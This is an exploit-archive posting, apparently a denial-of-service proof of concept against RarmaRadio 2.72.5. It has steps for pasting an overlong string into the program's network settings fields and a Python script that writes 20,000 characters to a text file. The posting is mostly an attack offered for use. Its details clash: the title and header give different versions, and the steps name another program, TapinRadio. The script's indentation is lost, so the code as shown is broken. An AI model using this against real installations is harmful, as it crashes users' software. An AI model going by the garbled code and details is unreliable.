RarmaRadio 2.72.5 Denial Of Service

RarmaRadio version 2.72.5 suffers from a denial of service vulnerability.


MD5 | f007c3c331444146b3b4997efe8db6e3

# Exploit Title: RarmaRadio 2.72.5 - Denial of Service (PoC)
# Date: 2020-05-12
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: https://www.raimersoft.com/rarmaradio.html
# Version: 2.75.5
# Tested on: Windows 10 Home x64
# CVE : n/a

#STEPS
# Open the program TapinRadio
# In Edit select Settings option
# Click in Network
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Paimon.txt"
# Paste the content in the field Username, Address and Server and click in OK
# End :)


buffer = 'K' * 20000

try:
file = open("Paimon.txt","w")
file.write(buffer)
file.close()

print("Archive ready")
except:
print("Archive no ready")

Related Posts